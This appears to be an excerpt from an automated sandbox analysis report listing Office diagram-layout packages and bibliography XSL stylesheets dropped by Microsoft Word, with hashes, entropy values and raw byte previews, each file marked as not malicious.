                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5596
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.875182123405584
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                                                                                                                                                                                                                                          MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3683
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.772039166640107
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                                                                                                                                                                                                                                          MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4888
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8636569313247335
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                                                                                                                                                                                                                                          MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6448
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.897260397307811
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                                                                                                                                                                                                                                          MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5630
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.87271654296772
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                                                                                                                                                                                                                                          MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                                                                                                                                                                                                                                          SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6193
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.855499268199703
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                                                                                                                                                                                                                                          MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3075
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.716021191059687
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                                                                                                                                                                                                                                          MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5151
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.859615916913808
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                                                                                                                                                                                                                                          MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):333258
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.654450340871081
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                                                                                                                                                                                                                                          MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):296658
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.000002997029767
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                                                                                                                                                                                                                                          MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):268317
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.05419861997223
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                                                                                                                                                                                                                                          MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                                                                                                                                                                                                                                          SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):255948
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.103631650117028
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
